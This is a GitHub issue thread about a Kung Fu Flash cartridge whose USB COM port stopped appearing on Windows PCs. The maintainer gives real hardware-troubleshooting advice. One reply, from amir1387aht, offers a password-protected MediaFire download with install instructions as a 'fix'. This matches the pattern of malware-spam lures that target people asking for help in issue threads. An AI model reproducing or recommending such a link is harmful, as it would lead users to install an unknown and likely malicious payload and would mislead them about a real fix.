KimJorgensen/KungFuFlash #200: Communication error with PC

Dimension1471, 2024-08-27:
When I connect the USB cable to the PC, the COM port does not appear.
I have tried several PCs with Windows 7 and 10 and with different USB cables.

At first everything worked fine (a couple of months).

amir1387aht, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

Dimension1471, 2024-09-04:
Help me please. I want to continue using my "Kung fu flash" with my commodore 128

KimJorgensen, 2024-09-08:
The USB port is only active under certain conditions, as described in the [readme](https://github.com/KimJorgensen/KungFuFlash?tab=readme-ov-file#usb-port) but I assume you know this since you had it working before.

From your description, it sounds like there is a problem with the Kung Fu Flash cartridge itself. If you have access to another cartridge you could try to test with that.
If you purchased the cartridge you should contact the seller for support. Did you build your own cartridge, I would check the solder joints with a microscope especially at the USB socket.

closed 2024-12-29 by KimJorgensen